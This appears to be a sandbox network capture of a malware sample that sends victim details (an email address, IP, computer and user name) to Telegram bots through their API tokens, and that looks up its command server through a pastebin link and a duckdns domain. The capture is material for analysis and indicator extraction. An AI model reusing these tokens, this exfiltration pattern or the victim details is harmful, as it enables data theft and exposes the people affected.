2024-05-10 19:31:51 UTC	605	OUT	POST /bot7198128499:AAHSvX4jW6n9t45ItKyUTcn3TOm2bCJdS-s/sendMessage HTTP/1.1 Host: api.telegram.org Connection: keep-alive Content-Length: 234 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/json Accept: / Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-10 19:31:51 UTC	234	OUT	Data Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 22 36 34 38 31 32 37 30 39 30 38 22 2c 22 74 65 78 74 22 3a 22 5c 6e 5c 74 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 55 53 45 52 20 49 4e 46 4f 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 5c 74 46 69 6c 65 20 64 6f 77 6e 6c 6f 61 64 65 64 20 62 79 20 4a 43 43 42 75 64 67 65 74 53 65 72 76 69 63 65 73 43 6f 6e 74 61 63 74 73 54 72 69 61 6c 43 6f 75 72 74 73 40 6a 75 64 2e 63 61 2e 67 6f 76 5c 6e 5c 74 46 72 6f 6d 20 52 6f 6d 61 6e 69 61 20 5c 6e 5c 74 49 50 20 61 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 36 32 2e 33 34 5c 6e 5c 74 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 45 4e 44 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 5c 74 22 7d Data Ascii: {"chat_id":"6481270908","text":"\n\t============== USER INFO ===========\n\tFile downloaded by JCCBudgetServicesContactsTrialCourts@jud.ca.gov\n\tFrom Romania \n\tIP address: 81.181.62.34\n\t================ END ================\n\t"}
2024-05-10 19:31:53 UTC	347	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Fri, 10 May 2024 19:31:53 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-05-10 19:31:53 UTC	58	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:53 UTC	266	OUT	GET / HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Language: en-ch Accept-Encoding: gzip, deflate Host: json.geoiplookup.io Connection: Keep-Alive
2024-05-10 19:31:53 UTC	800	IN	HTTP/1.1 200 OK Date: Fri, 10 May 2024 19:31:53 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close vary: Accept-Encoding access-control-allow-origin: * x-ratelimit-limit: 10000 x-ratelimit-remaining: 9994 x-powered-by: Octolus x-content-type-options: nosniff x-content-type-options: nosniff x-xss-protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=utccVFz9IGeX8UGULMyucbk%2FDo2exohao1LQoH0AAKTKF2nxLUAj9YDxt1927Xi5qX8UVCEx89hwIStsU9wDwC4klzJX9oCqzUxSoH2IUjajdqzsMKmMP4BC0vkjSon38t6YA%2B%2Bn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 881c5a21bd068f4d-ORD alt-svc: h3=":443"; ma=86400
2024-05-10 19:31:53 UTC	569	IN	Data Raw: 33 31 35 0d 0a 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 20 20 22 69 73 70 22 3a 20 22 49 6e 73 74 69 74 75 74 75 6c 20 4e 61 74 69 6f 6e 61 6c 20 64 65 20 43 65 72 63 65 74 61 72 65 2d 44 65 7a 76 6f 6c 74 61 72 65 20 69 6e 20 69 6e 66 6f 72 6d 61 74 69 63 61 20 2d 20 49 43 49 20 42 75 63 75 72 65 73 74 69 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 49 6e 73 74 69 74 75 74 75 6c 20 4e 61 74 69 6f 6e 61 6c 20 64 65 20 43 65 72 63 65 74 61 72 65 2d 44 65 7a 76 6f 6c 74 61 72 65 20 69 6e 20 69 6e 66 6f 72 6d 61 74 69 63 61 20 2d 20 49 43 49 20 42 75 63 75 72 65 73 74 69 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 20 20 22 6c 61 74 69 74 75 64 Data Ascii: 315{ "ip": "81.181.62.34", "isp": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti", "org": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti", "hostname": "81.181.62.34", "latitud
2024-05-10 19:31:53 UTC	227	IN	Data Raw: 6d 65 22 3a 20 22 45 75 72 6f 70 65 5c 2f 42 75 63 68 61 72 65 73 74 22 2c 0a 20 20 20 20 22 63 6f 6e 6e 65 63 74 69 6f 6e 5f 74 79 70 65 22 3a 20 22 43 6f 72 70 6f 72 61 74 65 22 2c 0a 20 20 20 20 22 61 73 6e 5f 6e 75 6d 62 65 72 22 3a 20 30 2c 0a 20 20 20 20 22 61 73 6e 5f 6f 72 67 22 3a 20 22 22 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 63 6f 64 65 22 3a 20 22 52 4f 4e 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 6e 61 6d 65 22 3a 20 22 52 6f 6d 61 6e 69 61 6e 20 4c 65 75 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 70 72 65 6d 69 75 6d 22 3a 20 66 61 6c 73 65 0a 7d 0d 0a Data Ascii: me": "Europe\/Bucharest", "connection_type": "Corporate", "asn_number": 0, "asn_org": "", "asn": "", "currency_code": "RON", "currency_name": "Romanian Leu", "success": true, "premium": false}
2024-05-10 19:31:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:53 UTC	289	OUT	POST /bot6968126468:AAFBucF0UmhmKMp_RgCJWJVC7hjGAO25mwg/sendMessage HTTP/1.1 Connection: Keep-Alive Content-Type: application/json Accept: / Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 104 Host: api.telegram.org
2024-05-10 19:31:53 UTC	104	OUT	Data Raw: 7b 22 63 68 61 74 5f 69 64 22 3a 22 36 34 38 31 32 37 30 39 30 38 22 2c 22 74 65 78 74 22 3a 22 41 63 63 65 73 73 20 67 72 61 6e 74 65 64 21 20 49 50 3a 20 38 31 2e 31 38 31 2e 36 32 2e 33 34 2c 20 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 4a 4f 4e 45 53 2d 50 43 2c 20 55 73 65 72 3a 20 6a 6f 6e 65 73 22 7d Data Ascii: {"chat_id":"6481270908","text":"Access granted! IP: 81.181.62.34, Computer Name: user-PC, User: user"}
2024-05-10 19:31:54 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 May 2024 19:31:54 GMT Content-Type: application/json Content-Length: 348 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-05-10 19:31:54 UTC	348	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 39 36 38 31 32 36 34 36 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 46 49 4c 45 20 43 4c 49 43 4b 45 44 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 6c 69 6b 65 64 61 62 6f 66 69 6c 65 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 34 38 31 32 37 30 39 30 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 61 64 69 6e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 35 33 36 39 35 31 34 2c 22 74 65 78 74 22 3a 22 41 63 63 65 73 73 20 67 72 61 6e 74 65 64 21 20 49 50 3a 20 38 31 2e 31 38 31 2e 36 32 2e 33 34 Data Ascii: {"ok":true,"result":{"message_id":73,"from":{"id":6968126468,"is_bot":true,"first_name":"FILE CLICKED","username":"clikedabofilebot"},"chat":{"id":6481270908,"first_name":"Xadin","type":"private"},"date":1715369514,"text":"Access granted! IP: 81.181.62.34

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:55 UTC	158	OUT	GET /raw/NsQ5qTHr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com
2024-05-10 19:31:55 UTC	391	IN	HTTP/1.1 200 OK Date: Fri, 10 May 2024 19:31:55 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Fri, 10 May 2024 14:42:14 GMT Server: cloudflare CF-RAY: 881c5a2e78f88131-ORD
2024-05-10 19:31:55 UTC	29	IN	Data Raw: 31 37 0d 0a 6d 61 73 74 65 72 6f 6b 72 77 68 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 0d 0a Data Ascii: 17masterokrwh.duckdns.org
2024-05-10 19:31:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:56 UTC	266	OUT	GET / HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Language: en-ch Accept-Encoding: gzip, deflate Host: json.geoiplookup.io Connection: Keep-Alive
2024-05-10 19:31:57 UTC	802	IN	HTTP/1.1 200 OK Date: Fri, 10 May 2024 19:31:57 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close vary: Accept-Encoding access-control-allow-origin: * x-ratelimit-limit: 10000 x-ratelimit-remaining: 9993 x-powered-by: Octolus x-content-type-options: nosniff x-content-type-options: nosniff x-xss-protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2B3bQgFDXkrBq5DzSmfn8OzUeB7GC7WeGCJxIfN8cmOfjEXO8L4aaKuU0E%2FEoNV3D4J95a9Um3YQdnaAfgL%2FxixOtbEY04WFNJzB9swLl4Mx2%2BTe4YVG8byfmRnzzaCXHVYwFJqG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 881c5a3a2ebee271-ORD alt-svc: h3=":443"; ma=86400
2024-05-10 19:31:57 UTC	567	IN	Data Raw: 33 31 35 0d 0a 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 20 20 22 69 73 70 22 3a 20 22 49 6e 73 74 69 74 75 74 75 6c 20 4e 61 74 69 6f 6e 61 6c 20 64 65 20 43 65 72 63 65 74 61 72 65 2d 44 65 7a 76 6f 6c 74 61 72 65 20 69 6e 20 69 6e 66 6f 72 6d 61 74 69 63 61 20 2d 20 49 43 49 20 42 75 63 75 72 65 73 74 69 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 49 6e 73 74 69 74 75 74 75 6c 20 4e 61 74 69 6f 6e 61 6c 20 64 65 20 43 65 72 63 65 74 61 72 65 2d 44 65 7a 76 6f 6c 74 61 72 65 20 69 6e 20 69 6e 66 6f 72 6d 61 74 69 63 61 20 2d 20 49 43 49 20 42 75 63 75 72 65 73 74 69 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 20 20 22 6c 61 74 69 74 75 64 Data Ascii: 315{ "ip": "81.181.62.34", "isp": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti", "org": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti", "hostname": "81.181.62.34", "latitud
2024-05-10 19:31:57 UTC	229	IN	Data Raw: 6e 61 6d 65 22 3a 20 22 45 75 72 6f 70 65 5c 2f 42 75 63 68 61 72 65 73 74 22 2c 0a 20 20 20 20 22 63 6f 6e 6e 65 63 74 69 6f 6e 5f 74 79 70 65 22 3a 20 22 43 6f 72 70 6f 72 61 74 65 22 2c 0a 20 20 20 20 22 61 73 6e 5f 6e 75 6d 62 65 72 22 3a 20 30 2c 0a 20 20 20 20 22 61 73 6e 5f 6f 72 67 22 3a 20 22 22 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 63 6f 64 65 22 3a 20 22 52 4f 4e 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 6e 61 6d 65 22 3a 20 22 52 6f 6d 61 6e 69 61 6e 20 4c 65 75 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 70 72 65 6d 69 75 6d 22 3a 20 66 61 6c 73 65 0a 7d 0d 0a Data Ascii: name": "Europe\/Bucharest", "connection_type": "Corporate", "asn_number": 0, "asn_org": "", "asn": "", "currency_code": "RON", "currency_name": "Romanian Leu", "success": true, "premium": false}
2024-05-10 19:31:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0